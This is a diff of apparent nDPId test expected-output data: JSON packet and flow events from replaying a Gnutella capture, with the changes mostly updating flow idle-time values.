+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0K4pAAIAGtdYKAAIPb\/adXsQzx+daqkeOAAAAAIAC+vAsaAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vG5AAIAGN8cKAAIPAST5W8Q1\/ZgxDGGiAAAAAIAC+vAZFAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BKJAAIAGOesKAAIPSQNnJcQ2Q5DEXLK5AAAAAIAC+vA5CwAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":77138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77138,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZZtAAIAGsgYKAAIPTESKz8Q3sBfW5xLuAAAAAIAC+vAy2AAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":77329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdNAAIAG7kAKAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VP5AAIAGOukKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LZAAIAGCWYKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lylAAIAGNGEKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYhAAIAGqN8KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOdAAIAGV+0KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsZAAIAGE88KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":63001,"flow_last_seen":78517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":78517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":79200,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79200,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KchAAIAGHhYKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UW1AAIAGasEKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kRAAIAGdAUKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0A+BAAIAG2\/IKAAIPYhKs0MRB9sQLj4LfAAAAAIAC+vAPuQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LJxAAIAGiMMKAAIPbdLLg8RCGMrxPNpbAAAAAIAC+vCGFQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0RnFAAIAGeL8KAAIPJO0KmMRAUy2fhJtvAAAAAIAC+vDmKQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Dd9AAIAGwQIKAAIPQh7dtcRHyWh8xjFMAAAAAIAC+vAMegAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iw1AAIAGfuAKAAIPUAf8wMRGsnV8RDFlAAAAAIAC+vD24gAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0c0RAAIAGinwKAAIPvD00t8RE+erRmdziAAAAAIAC+vAKcAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0I3VAAIAGoEwKAAIPST7htcRFtvuqIJp6AAAAAIAC+vB9QAAAAgQFtAEDAwgBAQQC"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":80247,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":80247,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4AvwAAP8Bn\/gKAAICCgACDwMBntkAAAAARQAANGWbQAB\/BrMGCgACD0xEis\/EN7AX1ucS7g=="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":81278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":81278,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnRAAIAGzTYKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":81294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":81294,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvlAAIAGYVIKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":81278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":81278,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnRAAIAGzTYKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":81294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":81294,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvlAAIAGYVIKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82057,"flow_last_seen":82057,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":82057,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"174.115.111.224","src_port":28681,"dst_port":51984,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":82057,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82057,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vx8AAIARUTcKAAIPrnNv4HAJyxAAIDoGR05EED68AQFUC1FLUlAGUk5BXS\/iNQlw"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82057,"flow_last_seen":82057,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":82057,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.182.103","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -646,10 +646,10 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":82066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82066,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0e5YAAIARIEQKAAIPUflA13AJYeIAIC6CR05EED7yAQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82066,"flow_last_seen":82066,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":82066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":82066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82066,"pkt":"UlQAEjUCCAAn5uVZCABFAAA06UQAAIARhsgKAAIPW7Ni6nAJGMoAIEvMR05EED7zAQFUC1FLUlAGUk5BXS\/iNQlw"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":82326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+G5AAIAG6ugKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":82326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00ENAAIAGLmAKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":82326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYhAAIAGFfYKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":83345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":83345,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdRAAIAG7j8KAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":82326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+G5AAIAG6ugKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":82326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00ENAAIAGLmAKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":82326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":82326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYhAAIAGFfYKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":83345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":83345,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdRAAIAG7j8KAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83517,"flow_last_seen":83517,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":83517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.120.146","src_port":28681,"dst_port":12838,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":83517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":83517,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bTAAAIARH4QKAAIPKWR4knAJMiYAIE8WR05EED70AQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83517,"flow_last_seen":83517,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":83517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"186.93.139.92","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -673,74 +673,74 @@ 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83564,"flow_last_seen":83564,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":83564,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":28681,"dst_port":9239,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":83564,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":83564,"pkt":"UlQAEjUCCAAn5uVZCABFAABLd8UAAIAR7i8KAAIPcfxWonAJJBcANy3AJNUxAmj8GYH\/vMbgH9u+AwABABgAAADDA1NDUEECAlZDRUdUS0dihkRIVElQUEA="} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":83804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":83804,"pkt":"CAAn5uVZUlQAEjUCCABFAAB3AwYAAEARosNx\/FaiCgACDyQXcAkAY+agJNUxAmj8GYH\/vMbgH9u+AwEBAEQAAAAXJHH8VqIWAAAAAAAABMMCVVBDAQsGo0lQUGl4nAEeAOH\/2qTGGyrrJOoSptzxtNqH3sQRchsYX6MsAay4MHcT\/6kOwg=="} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83805,"flow_last_seen":83805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":83805,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":83805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":83805,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8ZAAIAGrlAKAAIPcfxWosRbJBfMcOElAAAAAIAC+vAJaQAAAgQFtAEDAwgBAQQC"} 